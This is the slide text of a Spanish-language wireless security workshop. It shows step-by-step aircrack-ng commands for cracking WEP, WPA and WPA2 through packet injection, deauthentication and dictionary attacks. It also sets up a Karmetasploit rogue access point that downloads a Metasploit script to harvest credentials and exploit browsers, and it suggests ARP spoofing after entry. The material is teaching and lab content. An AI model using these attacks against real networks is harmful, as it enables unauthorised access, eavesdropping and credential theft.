Workshop Seguridad

Inalmbrica

Jaime Andrs Restrepo

Agenda del Workshop

Cul es tu SSID?

Porqu el WorkShop?

Como vamos a trabajar?

Manos a la Obra!!

Cul es tu SSID?

Mara

Jaime

Jairo

Valentina

Andrs

Por que el Workshop?

Gran porcentaje de implementaciones
inalmbricas.

Poco inters por la seguridad en redes

inalmbricas, en entornos caseros y
empresariales.

Desconocimiento de los problemas de

seguridad en redes inalmbricas

Cmo vamos a Trabajar?

GRUPO I

SSID: (WEP, WEP-ST, WPA, WPA2)

Mac: 00:1B:11:3A:B6:9D

GRUPO II

SSID: (WEP-II, WEP-ST-II, WPA-II, WPA2-II)

Mac: F0:7D:68:52:AA:07

Manos a la obra!!

Inicia la maquina virtual o

introduce el DVD

Ingresa el usuario root y clave

toor, luego startx

Conecta la memoria Wireless

USB, si la tienes.

Si no tienes una tarjeta compatible.. No te preocupes

WEP

start-network

iwconfig

Iniciando la red y
configurando la
tarjeta

airmon-ng start wlan0

Ponemos nuestra
tarjeta inalmbrica
en modo monitor.

airodump-ng mon0

Iniciamos una
captura general de
trafico, para
identificar las redes
activas a las que
tenemos alcance.

Con los resultados

del comando
anterior, podemos
identificar varias
redes e informacin
que ser muy
importante para
poder descifrar la
clave de la red
inalmbrica.

Ponemos nuestra
tarjeta inalmbrica a
capturar la
informacin
especifica que nos
interesa, de la red
inalmbrica que
seleccionamos
anteriormente.

airodump-ng -c CANAL --bssid MACROUTER -w NOMBRE mon0

Iniciamos la
captura y
podemos ver los
usuarios
conectados,
cuantos paquetes
ha enviado y
capturamos esos
paquetes en el
archivo WEP.cap

Ejecutamos el
aircrack para sacar la
clave de la red, que
se encuentra en los
paquetes que
capturamos
anteriormente.

aircrack-ng WEP-01.cap

Clave en HEXA

Clave: weppw

En la anterior captura, es en
un entorno donde hay
clientes conectados y
haciendo uso de la red.



Pero y si no hay trafico?

Identificamos la red
que deseamos
auditar y obtenemos
la informacin que
ser importante
para poder descifrar
la clave de la red
inalmbrica.

Identificamos un
cliente conectado a
la red, pero no esta
navegando y no
conseguimos muchos
datos.

Pocos datos

Si hay clientes pero no hay trafico

Intentamos crackear
la clave con los pocos
paquetes que
logramos conseguir y
nos dice que
necesitamos muchos
mas paquetes Qu
hacemos?

Pocos datos y solo 12 IVs (vector de

inicializacin), necesitaremos al menos 5000

airodump-ng -c 6 --bssid MACROUTER -w WEP-ST mon0

Como el cliente que
tenemos conectado
a la red, no esta
navegando, vamos a
capturar algn
paquete que envi el
cliente, suplantarlo y
reenviarlo muchas
veces trafico al
router.

aireplay-ng -3 -b MACROUTER -h MACCLIENTE mon0

Logramos una buena cantidad de datos

Conseguimos
capturar un paquete
del cliente y
repetirlo muchas
veces para generar
trafico suplantando
el cliente legitimo
ante el router.

Paquetes que inyectamos

28059 IVs, contra 12 que tenamos.

Despus de inyectar
todos esos
paquetes, ya
contamos con los
suficientes vectores
para crackear la
clave como ya lo
hicimos
anteriormente.

aircrack-ng WEP-ST-01.cap

Puedo automatizar
todos estos procesos?

WepBuster Wesside-NG

cd /pentest/
wepbuster/

./wepbuster

Wesside-ng i mon0

WPA

Iniciamos una
captura general de
trafico, para
identificar las redes
WPA activas a las
que tenemos
alcance.

airodump-ng mon0

Ponemos nuestra
tarjeta inalmbrica a
capturar la
informacin
especifica que nos
interesa, de la red
inalmbrica que
seleccionamos
anteriormente.

airodump-ng -c CANAL --bssid MACROUTER -w NOMBRE mon0

Iniciamos la
captura y
podemos ver los
usuarios
conectados,
cuantos paquetes
ha enviado y
capturamos esos
paquetes en el
archivo WPA.cap

Tenemos muy buenos datos, pero

Como WPA se
crackea, por
fuerza bruta y no
descifrando la
clave como WEP,
no nos importa los
datos sino el
apretn de
manos inicial
entre el pc y el
router
Al ejecutar aircrack-ng WPA-01.cap,
(handshake)

nos encontramos con 0 handshake

Ponemos a capturar

En esta ocasin lo que
nos importa es
capturar por la el
apretn de manos
donde se ponen de
acuerdo cliente y
servidor de la forma
en que trabajaran,
esta informacin la
usaremos para
crackear la clave wifi
por fuerza bruta.

airepaly-ng -0 1 a MACROUTER c MACCLIENTE mon0

aircrack-ng WPA-01.cap

Lanzamos el
aircrack a el
archivo .cap
generado, para
verificar que
efectivamente
contemos con el
handshake
(apretn de
manos) y podemos
empezar a lanzar
el ataque de fuerza
bruta.

Lanzamos el
ataque de fuerza
bruta con el
diccionario que
trae incorporado el
backtrack y
esperamos que
alguna de las claves
que estn en el,
sea la del router.

aircrack-ng -w /pentest/passwords/wordlists/wpa.txt
-b 00:1B:3A:B6:9D WPA-01.cap

KEY FOUND!,
encontramos la
clave de la red
WPA, despus ya
que
afortunadamente
estaba en el
diccionario de
password que
utilizamos.

Despus de casi 14 minutos, obtenemos la clave del

router, que en este caso era !n5en5!7!v!7y

WPA2
bsicamente lo mismo que WPA

airodump-ng -c CANAL --bssid

MACROUTER -w NOMBRE
mon0

airodump-ng mon0

airepaly-ng -0 1 a
MACROUTER c
MACCLIENTE mon0

aircrack-ng -w /pentest/
passwords/wordlists/
darkc0de.lst -b 00:1B:
11:3A:B6:9D WPA2-01.cap

Paramos el ataque de
des autenticacin y
verificamos que
tenemos el handshake

Iniciamos el crackeo de la
contrasea por fuerza bruta

KEY FOUND!,
encontramos la
clave de la red
WPA2, ya que
afortunadamente
estaba en el
diccionario de
password que
utilizamos.

Despus de casi 2 horas, obtenemos la clave del

router, que en este caso era ecuatoriano

Puedo automatizar
todos estos procesos?

WiFite Consola

GUI

http://code.google.com/p/wifite/

Que hago despus de

entrar a la red

admin

vaco

www.routerpasswords.com

Pero tambin podemos

Escanear la red en busca de equipos con
informacin o vulnerables.

Lanzar un ataque ARP Spoofing para capturar

los datos que corren por esa red inalmbrica.

Usar su infraestructura, impresoras, conexin

a internet y aplicaciones locales.

Cualquier otra cosa que se nos ocurra

EXTRAS

AirPwn

Framework
wireless que
permite inyectar
paquetes
entrantes, que
encajen con un
patrn que
definamos en el
archivo de
configuracin.

airpwn

airpwn d DRIVER i mon0

k CLAVEWEPHEXA c
CONFIGURACION vvv -F

Iniciamos la
herramienta con
una configuracin
personalizada que
nos permitir
reemplazar
cualquier peticin
HTTP del cliente
por la nuestra.

Ataque en
ejecucin.

Resultado del
ataque

Karmetasploit

airmon-ng start wlan0

Ponemos nuestra
tarjeta en modo
monitor e
iniciamos un
accesspoint con un
essid conocido

Airbase-ng P C 30 e ^WPA v
mon0

nano /etc/dhcp3/dhcpd.conf

option domain-name-servers
10.0.0.1;



default-lease-time 60;

max-lease-time 72;



ddns-update-style none;



authoritative;



log-facility local7;



subnet 10.0.0.0 netmask
255.255.255.0 {

range 10.0.0.100 10.0.0.254;

option routers 10.0.0.1;

option domain-name-servers
10.0.0.1;

}

ifconfig at0 up 10.0.0.1 netmask 255.255.255.0

/etc/init.d/dhcp3-server
start

wget http://digitaloffense.net/tools/karma.rc

Descargamos el
karmetasploit de
la pagina oficial, lo
ejecutamos y
esperamos que
cargue
completamente

./msfconsole r karma.rc

Atacante

Oye tu
eres mi
red?

Claro
yo soy
tu red

Comuncame por
fa con
pop.hotmail.com

Yo soy
pop.hotmail.com,
cual es tu usuario y
clave?

Mi usuario es
inocencia y mi
clave 123456

Muchas gracias
inocencia, espera yo
verifico tus datos

Victima

El resultado que veremos en los clientes

que se conecten a nuestro falso access
point, depende de los servicios que le
solicite el cliente al karmetasploit.



Si solicita un cliente pop3,ftp,dns,smb,
simula ser uno y almacena los datos que
proporcione el cliente en la base de datos
karma.db



Si hacemos una peticin http en cambio
nos ejecuta el modulo browser_autopwn
del metasploit, para tratar de explotar
alguna vulnerabilidad en nuestro
navegador y conseguir una shell en el
sistema.

Como nos
protegemos?

Como podemos protgenos?

Cambiar clave por defecto y SSID

(preferiblemente ocltelo) al router

Usar WPA o WPA2 con clave fuerte.

Realizar Filtrado por Mac y limitar el numero
de conexiones

Bajar la potencia a nuestro router

Apagar el router cuando no
se utilice

Usar pintura DefendAir

Cifrado: ???

Cifrado: ???

Cifrado: ???